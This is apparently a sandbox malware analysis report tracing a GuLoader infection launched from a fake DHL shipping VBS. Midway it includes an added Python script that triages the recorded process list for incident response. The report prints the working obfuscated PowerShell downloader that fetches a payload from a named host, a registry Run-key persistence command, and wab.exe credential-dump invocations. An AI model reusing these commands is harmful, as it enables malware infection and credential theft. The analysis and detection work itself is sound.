                                        2024-07-01 14:19:06 UTC8000INData Raw: 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 41 2b 42 70 41 41 41 41 4e 33 54 44 32 37 61 36 31 49 6b 39 35 41 30 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 6d 77 39 31 39 51 2f 34 39 65 74 43 73 34 61 4e 47 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.9 | 60918 | 192.185.112.252 | 443 | 1712 | C:\Program Files (x86)\Windows Mail\wab.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-07-01 14:19:51 UTC | 172 | OUT | GET /zPwwF47.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: contemega.com.do
                                        Cache-Control: no-cache
                                        2024-07-01 14:19:51 UTC | 301 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 01 Jul 2024 14:19:51 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Mon, 01 Jul 2024 07:45:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 494656
                                        content-Security-Policy: upgrade-insecure-requests
                                        Content-Type: application/octet-stream



                                        Target ID:0
                                        Start time:10:19:00
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
                                        Imagebase:0x7ff796e70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:10:19:01
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd 
eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:10:19:01
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:10:19:04
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
                                        Imagebase:0x7ff6d5690000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:10:19:10
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd 
eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
                                        Imagebase:0x7a0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:10:19:11
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:10:19:45
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:10:19:49
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                                        Imagebase:0xa30000
                                        File size:59'392 bytes
                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:17
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:18
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:19
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:20
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:10:20:08
                                        Start date:01/07/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
                                        Imagebase:0x790000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:10:20:30
                                        Start date:01/07/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
                                        Imagebase:0xea0000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true
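The process list above shows the full post-exploitation chain in command lines alone: reg.exe writes a REG_EXPAND_SZ Run value whose command starts with %Udvalgenes215%, so the interpreter is not visible in the Run key itself, and the PowerShell it runs pulls its real payload out of HKCU:\Fiberstof\Ufuldkommenheds; the injected wab.exe instances are launched with /stext, a NirSoft recovery-tool switch that wab.exe does not have, writing credential dumps to Temp; and wscript.exe runs a dropped VBS from Temp. The triage script below is an added example, not part of the Joe Sandbox report or its tooling. Its event records are constructed from the command lines above, the rule names are mine, and the suggestion that %Udvalgenes215% be looked up under HKCU\Environment is an assumption, since the report does not show where that variable is set.

```python
"""Triage a process list for the GuLoader/Remcos artifacts seen in the report above.

Added example, not Joe Sandbox code: it parses constructed process-creation
records (copied from the command lines in the process list) and extracts what
an incident responder should collect next: the Run-key value, the environment
variable that value depends on, the registry value the PowerShell payload is
read from, the files written by the injected wab.exe, and the dropped VBS.
"""
import re

# Constructed records: pid, image and command line taken from the process list above.
SAMPLE_EVENTS = [
    {"pid": 10, "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"pid": 14, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"'''},
    {"pid": 17, "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"'},
    {"pid": 20, "image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"'},
    {"pid": 23, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"'},
]

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
REG_ADD_RE = re.compile(r'REG\s+ADD\s+(?P<key>\S+)\s+(?P<opts>.*?)/d\s+"(?P<data>.*)"\s*$', re.I)
VALUE_NAME_RE = re.compile(r'/v\s+"?(?P<name>[^"\s]+)"?', re.I)
VALUE_TYPE_RE = re.compile(r"/t\s+(?P<type>REG_\w+)", re.I)
ENV_REF_RE = re.compile(r"%([^%\s]+)%")
# (Get-ItemProperty -Path '<key>').<value>: the real payload is stored in the registry.
PS_REG_READ_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'(?P<path>[^']+)'\s*\)\s*\.(?P<prop>\w+)", re.I)
# /stext is a NirSoft recovery-tool switch; wab.exe has no such option, so seeing it
# means a credential dumper was injected into wab.exe.
STEXT_RE = re.compile(r'/stext\s+"?(?P<out>[^"]+?)"?\s*$', re.I)
TEMP_SCRIPT_RE = re.compile(r'"?(?P<script>[A-Za-z]:\\[^"]*\\AppData\\Local\\Temp\\[^"]*\.(?:vbs|js|wsf|ps1))"?', re.I)


def triage(events):
    """Return one finding per matching rule, in event order."""
    findings = []
    for ev in events:
        image, cmd = ev["image"].lower(), ev["cmdline"]
        m = REG_ADD_RE.search(cmd)
        if m and m.group("key").lower().endswith(r"\currentversion\run"):
            data = m.group("data")
            reads = [(r.group("path"), r.group("prop")) for r in PS_REG_READ_RE.finditer(data)]
            # A Run command that *starts* with %VAR% hides the interpreter behind a
            # variable the attacker must also have planted in the user's environment.
            if data.startswith("%") or reads:
                name = VALUE_NAME_RE.search(m.group("opts"))
                vtype = VALUE_TYPE_RE.search(m.group("opts"))
                findings.append({
                    "rule": "run_key_indirect_loader", "pid": ev["pid"],
                    "value_name": name.group("name") if name else None,
                    "value_type": vtype.group("type").upper() if vtype else None,
                    "env_vars": sorted(set(ENV_REF_RE.findall(data))),
                    "registry_reads": reads,
                })
        s = STEXT_RE.search(cmd)
        if s and image.endswith("\\wab.exe"):
            findings.append({"rule": "wab_stext_credential_dump", "pid": ev["pid"],
                             "output_file": s.group("out")})
        if image.endswith(("\\wscript.exe", "\\cscript.exe")):
            t = TEMP_SCRIPT_RE.search(cmd)
            if t:
                findings.append({"rule": "script_host_from_temp", "pid": ev["pid"],
                                 "script": t.group("script")})
    return findings


def artifacts_to_collect(findings):
    """Registry values and files to acquire from the host, derived from the findings."""
    registry, files = [], []
    for f in findings:
        if f["rule"] == "run_key_indirect_loader":
            registry.append(RUN_KEY + "\\" + (f["value_name"] or "<unnamed>"))
            # Assumption: a user-scoped variable such as %Udvalgenes215% would be
            # persisted under HKCU\Environment; the report does not show where it is set.
            registry.extend("HKCU\\Environment\\" + v for v in f["env_vars"])
            for path, prop in f["registry_reads"]:
                registry.append(path.replace("HKCU:", "HKCU", 1).rstrip("\\") + "\\" + prop)
        else:
            files.append(f.get("output_file") or f.get("script"))
    return {"registry": registry, "files": files}


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
    print(artifacts_to_collect(triage(SAMPLE_EVENTS)))
```

Only the reg.exe record is included for the Run-key write; feeding the parent cmd.exe line (Target ID 12) as well would simply produce the same finding twice. The run_key_indirect_loader rule deliberately fires on either trigger, a command beginning with %VAR% or a Get-ItemProperty read of another key, so a loader that uses just one of the two tricks is still caught, while an ordinary REG_SZ Run value pointing at an executable is not.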

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e28fb508a451c6c56df15aa58d696bb81cefe55d5e221d01005a6a111306f398
                                          • Instruction ID: d40a27d9e4675e4cd71c9331d0d816bc84b34d1e9b9a3f82a16652c7f30f6062
                                          • Opcode Fuzzy Hash: e28fb508a451c6c56df15aa58d696bb81cefe55d5e221d01005a6a111306f398
                                          • Instruction Fuzzy Hash: 01F1B630918A8E8FEBA8DF28C8557E937E1FF54350F14426ED84DC7691DB38A945CB82
                                          Memory Dump Source
